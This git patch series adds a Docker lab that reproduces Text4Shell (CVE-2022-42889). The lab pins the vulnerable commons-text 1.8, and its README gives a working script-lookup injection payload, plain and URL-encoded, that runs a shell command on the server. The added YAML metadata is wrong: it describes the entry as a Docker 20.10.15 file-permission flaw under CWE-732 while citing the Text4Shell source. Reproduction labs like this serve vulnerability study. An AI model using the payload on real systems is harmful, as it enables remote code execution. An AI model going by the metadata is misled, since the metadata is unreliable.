From 600ba59d6f0dd0a80c839d90a437c75dbc0cde9a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 12:50:23 +0000 Subject: [PATCH 01/19] add cve/linux-kernel/2022/CVE-2022-42046. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/linux-kernel/2022/CVE-2022-42046 | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-42046 diff --git a/cve/linux-kernel/2022/CVE-2022-42046 b/cve/linux-kernel/2022/CVE-2022-42046 new file mode 100644 index 00000000..e69de29b -- Gitee From 4bd04b56c99a5052ab3503db8d8dda182dc58b3c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 12:51:24 +0000 Subject: [PATCH 02/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-42046?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/{CVE-2022-42046 => CVE-2022-42046/.keep} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/linux-kernel/2022/{CVE-2022-42046 => CVE-2022-42046/.keep} (100%) diff --git a/cve/linux-kernel/2022/CVE-2022-42046 b/cve/linux-kernel/2022/CVE-2022-42046/.keep similarity index 100% rename from cve/linux-kernel/2022/CVE-2022-42046 rename to cve/linux-kernel/2022/CVE-2022-42046/.keep -- Gitee From 4ea64167ccc431e4ca6eb4fd5d4909d70fce3de0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 12:58:38 +0000 Subject: [PATCH 03/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/docker/2022/.keep diff --git a/cve/docker/2022/.keep b/cve/docker/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 5ee1ddaf509e11bdb663fc55001d6866bc10717f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:00:38 +0000 Subject: [PATCH 04/19] add cve-2022-42889 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/docker/2022/.gitignore | 8 +++++ cve/docker/2022/Dockerfile | 18 +++++++++++ cve/docker/2022/README.md | 61 ++++++++++++++++++++++++++++++++++++++ cve/docker/2022/pom.xml | 46 ++++++++++++++++++++++++++++ 4 files changed, 133 insertions(+) create mode 100644 cve/docker/2022/.gitignore create mode 100644 cve/docker/2022/Dockerfile create mode 100644 cve/docker/2022/README.md create mode 100644 cve/docker/2022/pom.xml diff --git a/cve/docker/2022/.gitignore b/cve/docker/2022/.gitignore new file mode 100644 index 00000000..380d1261 --- /dev/null +++ b/cve/docker/2022/.gitignore @@ -0,0 +1,8 @@ +bin +target +.classpath +.project +.settings +src/main/webapp/META-INF +.idea +*.iml \ No newline at end of file diff --git a/cve/docker/2022/Dockerfile b/cve/docker/2022/Dockerfile new file mode 100644 index 00000000..a31999b9 --- /dev/null +++ b/cve/docker/2022/Dockerfile @@ -0,0 +1,18 @@ +# Use an official OpenJDK runtime as a parent image +FROM openjdk:8-jre-alpine + +# set shell to bash +# source: https://stackoverflow.com/a/40944512/3128926 +RUN apk update && apk add bash + +# Set the working directory to /app +WORKDIR /app + +# Copy the fat jar into the container at /app +COPY /target/text4shell-poc.jar /app + +# Make port 8080 available to the world outside this container +EXPOSE 8080 + +# Run jar file when the container launches +CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file diff --git a/cve/docker/2022/README.md b/cve/docker/2022/README.md new file mode 100644 index 00000000..2452d91e --- /dev/null +++ b/cve/docker/2022/README.md @@ -0,0 +1,61 @@ +### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) +------------- + + +1. Maven install to create the fat jar + +``` +mvn clean install +``` + +2. Docker build + +``` +docker build --tag=text4shell . +``` + +3. Docker run + +``` +docker run -p 80:8080 text4shell +``` + +4. Test the app + +``` +http://localhost/text4shell/attack?search= +``` + +5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: + +``` +${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} +``` + +http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D + +6. You can also try using `dns` or `url` prefixes. + +7. Get the container id + +``` +docker container ls +``` + +8. Get into the app + +``` +docker exec -it bash +``` + +9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): + +``` +ls /tmp/ +``` + +10. To stop the container + +``` +docker container stop +``` \ No newline at end of file diff --git a/cve/docker/2022/pom.xml b/cve/docker/2022/pom.xml new file mode 100644 index 00000000..80084258 --- /dev/null +++ b/cve/docker/2022/pom.xml @@ -0,0 +1,46 @@ + + 4.0.0 + com.levo.dockerexample + docker-java-app-example + jar + 1.0-SNAPSHOT + docker-java-app-example + http://maven.apache.org + + + UTF-8 + UTF-8 + 1.8 + com.levo.dockerexample.DockerApp + + + + org.springframework.boot + spring-boot-starter-parent + 2.1.1.RELEASE + + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.commons + commons-text + 1.8 + + + + + text4shell-poc + + + org.springframework.boot + spring-boot-maven-plugin + + + + + -- Gitee From a8d32df14d06f5e8ca7dbcc6ba2ec28de8d5c8b3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:00:57 +0000 Subject: [PATCH 05/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/docker/2022/.keep diff --git a/cve/docker/2022/.keep b/cve/docker/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 35318928f14c2c65f607f6de4801d784df2e93b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:02:45 +0000 Subject: [PATCH 06/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/docker/2022/yaml/.keep diff --git a/cve/docker/2022/yaml/.keep b/cve/docker/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 5ead529ad14774fd09f4180c5989ff9631baa75f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:03:24 +0000 Subject: [PATCH 07/19] add cve/docker/2022/yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/docker/2022/yaml/CVE-2022-42889.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/docker/2022/yaml/CVE-2022-42889.yaml diff --git a/cve/docker/2022/yaml/CVE-2022-42889.yaml b/cve/docker/2022/yaml/CVE-2022-42889.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From a8778cf702496df5291df03e821d290b29db64b4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:04:54 +0000 Subject: [PATCH 08/19] update cve/docker/2022/yaml/CVE-2022-42889.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/docker/2022/yaml/CVE-2022-42889.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/cve/docker/2022/yaml/CVE-2022-42889.yaml b/cve/docker/2022/yaml/CVE-2022-42889.yaml index e69de29b..da4fb776 100644 --- a/cve/docker/2022/yaml/CVE-2022-42889.yaml +++ b/cve/docker/2022/yaml/CVE-2022-42889.yaml @@ -0,0 +1,21 @@ +id: CVE-2022-42889 +source: + https://github.com/karthikuj/cve-2022-42889-text4shell-docker +info: + name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 + severity: medium + description: | + Docker版本20.10.15(build fd82621)易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。 + scope-of-influence: + Docker 20.10.15, build fd82621 + reference: + - https://www.docker.com/ + - https://github.com/karthikuj/cve-2022-42889-text4shell-docker + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 6.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-732 + cnvd-id: None + kve-id: None + tags: 未授权访问 \ No newline at end of file -- Gitee From fc9e98e1b452a2ca51dd500d2a3d23ee7a66f45d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:05:04 +0000 Subject: [PATCH 09/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/docker/2022/yaml/.keep diff --git a/cve/docker/2022/yaml/.keep b/cve/docker/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 29c1e47cbc492b693ad0d3c79b062b5f66b6eff7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:05:17 +0000 Subject: [PATCH 10/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20C?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/C/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/docker/2022/C/.keep diff --git a/cve/docker/2022/C/.keep b/cve/docker/2022/C/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 33ae5dfeb1a173c90e39d654388b9ad1df9bfb65 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:05:37 +0000 Subject: [PATCH 11/19] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/docker/?= =?UTF-8?q?2022/C=20=E4=B8=BA=20cve/docker/2022/CVE-2022-42889?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/{C => CVE-2022-42889}/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/docker/2022/{C => CVE-2022-42889}/.keep (100%) diff --git a/cve/docker/2022/C/.keep b/cve/docker/2022/CVE-2022-42889/.keep similarity index 100% rename from cve/docker/2022/C/.keep rename to cve/docker/2022/CVE-2022-42889/.keep -- Gitee From 1f2cc2cb0c4d9cd9e7996cd5bad3f66c1a449953 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:05:49 +0000 Subject: [PATCH 12/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/.gitignore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/.gitignore | 8 -------- 1 file changed, 8 deletions(-) delete mode 100644 cve/docker/2022/.gitignore diff --git a/cve/docker/2022/.gitignore b/cve/docker/2022/.gitignore deleted file mode 100644 index 380d1261..00000000 --- a/cve/docker/2022/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -bin -target -.classpath -.project -.settings -src/main/webapp/META-INF -.idea -*.iml \ No newline at end of file -- Gitee From 2f5e860f7fe665f8432a08b6915f8553d18a3ae4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:06:01 +0000 Subject: [PATCH 13/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/Dockerfile?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/Dockerfile | 18 ------------------ 1 file changed, 18 deletions(-) delete mode 100644 cve/docker/2022/Dockerfile diff --git a/cve/docker/2022/Dockerfile b/cve/docker/2022/Dockerfile deleted file mode 100644 index a31999b9..00000000 --- a/cve/docker/2022/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# Use an official OpenJDK runtime as a parent image -FROM openjdk:8-jre-alpine - -# set shell to bash -# source: https://stackoverflow.com/a/40944512/3128926 -RUN apk update && apk add bash - -# Set the working directory to /app -WORKDIR /app - -# Copy the fat jar into the container at /app -COPY /target/text4shell-poc.jar /app - -# Make port 8080 available to the world outside this container -EXPOSE 8080 - -# Run jar file when the container launches -CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file -- Gitee From 780b866945c64d96c4b7ac95460bec9be199d111 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:06:06 +0000 Subject: [PATCH 14/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/README.md | 61 --------------------------------------- 1 file changed, 61 deletions(-) delete mode 100644 cve/docker/2022/README.md diff --git a/cve/docker/2022/README.md b/cve/docker/2022/README.md deleted file mode 100644 index 2452d91e..00000000 --- a/cve/docker/2022/README.md +++ /dev/null @@ -1,61 +0,0 @@ -### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) -------------- - - -1. Maven install to create the fat jar - -``` -mvn clean install -``` - -2. Docker build - -``` -docker build --tag=text4shell . -``` - -3. Docker run - -``` -docker run -p 80:8080 text4shell -``` - -4. Test the app - -``` -http://localhost/text4shell/attack?search= -``` - -5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: - -``` -${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} -``` - -http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D - -6. You can also try using `dns` or `url` prefixes. - -7. Get the container id - -``` -docker container ls -``` - -8. Get into the app - -``` -docker exec -it bash -``` - -9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): - -``` -ls /tmp/ -``` - -10. To stop the container - -``` -docker container stop -``` \ No newline at end of file -- Gitee From 45a30070da9b8d3a75dc0badbf84e2b0b6adfafd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:06:12 +0000 Subject: [PATCH 15/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/pom.xml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/pom.xml | 46 ----------------------------------------- 1 file changed, 46 deletions(-) delete mode 100644 cve/docker/2022/pom.xml diff --git a/cve/docker/2022/pom.xml b/cve/docker/2022/pom.xml deleted file mode 100644 index 80084258..00000000 --- a/cve/docker/2022/pom.xml +++ /dev/null @@ -1,46 +0,0 @@ - - 4.0.0 - com.levo.dockerexample - docker-java-app-example - jar - 1.0-SNAPSHOT - docker-java-app-example - http://maven.apache.org - - - UTF-8 - UTF-8 - 1.8 - com.levo.dockerexample.DockerApp - - - - org.springframework.boot - spring-boot-starter-parent - 2.1.1.RELEASE - - - - - org.springframework.boot - spring-boot-starter-web - - - org.apache.commons - commons-text - 1.8 - - - - - text4shell-poc - - - org.springframework.boot - spring-boot-maven-plugin - - - - - -- Gitee From a6f2d82749efb4bb20a357ec7bf8ba8308020d74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:06:32 +0000 Subject: [PATCH 16/19] add cve-2022-42889 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/docker/2022/CVE-2022-42889/.gitignore | 8 +++ cve/docker/2022/CVE-2022-42889/Dockerfile | 18 +++++++ cve/docker/2022/CVE-2022-42889/README.md | 61 +++++++++++++++++++++++ cve/docker/2022/CVE-2022-42889/pom.xml | 46 +++++++++++++++++ 4 files changed, 133 insertions(+) create mode 100644 cve/docker/2022/CVE-2022-42889/.gitignore create mode 100644 cve/docker/2022/CVE-2022-42889/Dockerfile create mode 100644 cve/docker/2022/CVE-2022-42889/README.md create mode 100644 cve/docker/2022/CVE-2022-42889/pom.xml diff --git a/cve/docker/2022/CVE-2022-42889/.gitignore b/cve/docker/2022/CVE-2022-42889/.gitignore new file mode 100644 index 00000000..380d1261 --- /dev/null +++ b/cve/docker/2022/CVE-2022-42889/.gitignore @@ -0,0 +1,8 @@ +bin +target +.classpath +.project +.settings +src/main/webapp/META-INF +.idea +*.iml \ No newline at end of file diff --git a/cve/docker/2022/CVE-2022-42889/Dockerfile b/cve/docker/2022/CVE-2022-42889/Dockerfile new file mode 100644 index 00000000..a31999b9 --- /dev/null +++ b/cve/docker/2022/CVE-2022-42889/Dockerfile @@ -0,0 +1,18 @@ +# Use an official OpenJDK runtime as a parent image +FROM openjdk:8-jre-alpine + +# set shell to bash +# source: https://stackoverflow.com/a/40944512/3128926 +RUN apk update && apk add bash + +# Set the working directory to /app +WORKDIR /app + +# Copy the fat jar into the container at /app +COPY /target/text4shell-poc.jar /app + +# Make port 8080 available to the world outside this container +EXPOSE 8080 + +# Run jar file when the container launches +CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file diff --git a/cve/docker/2022/CVE-2022-42889/README.md b/cve/docker/2022/CVE-2022-42889/README.md new file mode 100644 index 00000000..2452d91e --- /dev/null +++ b/cve/docker/2022/CVE-2022-42889/README.md @@ -0,0 +1,61 @@ +### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) +------------- + + +1. Maven install to create the fat jar + +``` +mvn clean install +``` + +2. Docker build + +``` +docker build --tag=text4shell . +``` + +3. Docker run + +``` +docker run -p 80:8080 text4shell +``` + +4. Test the app + +``` +http://localhost/text4shell/attack?search= +``` + +5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: + +``` +${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} +``` + +http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D + +6. You can also try using `dns` or `url` prefixes. + +7. Get the container id + +``` +docker container ls +``` + +8. Get into the app + +``` +docker exec -it bash +``` + +9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): + +``` +ls /tmp/ +``` + +10. To stop the container + +``` +docker container stop +``` \ No newline at end of file diff --git a/cve/docker/2022/CVE-2022-42889/pom.xml b/cve/docker/2022/CVE-2022-42889/pom.xml new file mode 100644 index 00000000..80084258 --- /dev/null +++ b/cve/docker/2022/CVE-2022-42889/pom.xml @@ -0,0 +1,46 @@ + + 4.0.0 + com.levo.dockerexample + docker-java-app-example + jar + 1.0-SNAPSHOT + docker-java-app-example + http://maven.apache.org + + + UTF-8 + UTF-8 + 1.8 + com.levo.dockerexample.DockerApp + + + + org.springframework.boot + spring-boot-starter-parent + 2.1.1.RELEASE + + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.commons + commons-text + 1.8 + + + + + text4shell-poc + + + org.springframework.boot + spring-boot-maven-plugin + + + + + -- Gitee From fd35c529abfdfd2bd13d154cf4b940945cab87bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:06:37 +0000 Subject: [PATCH 17/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/CVE-2022-42889/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/CVE-2022-42889/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/docker/2022/CVE-2022-42889/.keep diff --git a/cve/docker/2022/CVE-2022-42889/.keep b/cve/docker/2022/CVE-2022-42889/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 63c77171e26684270ee5541cdf633698c1a9a326 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:07:00 +0000 Subject: [PATCH 18/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-42046?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-42046/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-42046/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-42046/.keep b/cve/linux-kernel/2022/CVE-2022-42046/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 6e4bf2bacf21347f991aa5436b525be5fb8d1b29 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:08:11 +0000 Subject: [PATCH 19/19] update other_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index c9f163e3..84f8b63e 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -22,6 +22,7 @@ cve: - CVE-2019-6447 docker: - CVE-2019-5736 + - CVE-2022-42889 - CVE-2023-37708 samba: - CVE-2021-44142 -- Gitee